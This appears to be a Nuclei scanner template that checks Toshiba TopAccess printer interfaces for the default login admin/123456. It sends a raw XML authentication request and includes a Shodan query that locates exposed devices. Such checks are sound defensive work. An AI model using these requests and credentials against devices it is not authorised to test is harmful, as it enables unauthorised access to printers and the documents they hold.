id: topaccess-default-login
info:
name: Toshiba TopAccess - Default-Login
author: ritikchaddha
severity: high
reference:
- https://business.toshiba.com/downloads/KB/f1Ulds/11646/KH-1020_TAG_EN_0002.pdf
metadata:
verified: true
max-request: 2
shodan-query: title:"topaccess"
tags: topaccess,default-login,misconfig,vuln
variables:
username: "admin"
password: "123456"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /contentwebserver HTTP/1.1
Host: {{Hostname}}
csrfpId: {{csrf_token}}
Content-Type: text/plain; charset=UTF-8
<DeviceInformationModel><GetValue><Authentication><UserCredential></UserCredential></Authentication></GetValue><GetValue><Panel><DiagnosticMode><Mode_08><Code_8913></Code_8913></Mode_08></DiagnosticMode></Panel></GetValue><SetValue><Authentication><UserCredential><userName>{{username}}</userName><passwd>{{password}}</passwd><ipaddress></ipaddress><DepartmentManagement isEnable='false'><requireDepartment></requireDepartment></DepartmentManagement><domainName></domainName><applicationType>TOP_ACCESS</applicationType></UserCredential></Authentication></SetValue><SetValue><UserManager><View><Users><Information><passwd>admin</passwd></Information></Users></View></UserManager></SetValue><Command><Login><commandNode>Authentication/UserCredential</commandNode><Params><appName>TOPACCESS</appName></Params></Login></Command></DeviceInformationModel>
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<name>Administrator'
- 'STATUS_OK</statusOfOperation'
condition: and
- type: word
part: content_type
words:
- text/xml
- type: status
part: header_2
status:
- 200
extractors:
- type: kval
name: csrf_token
kval:
- 'session'
internal: true
# digest: 4b0a00483046022100d83bc80b9a8f964409eb138340902a44bd431ad77f9a297b9facc3dca562b0db022100d91082897f05d8e360c1c8c3ec6ded7119befb4f1dc711141da8b5466f145eaf:922c64590222798bb761d5b6d8e72950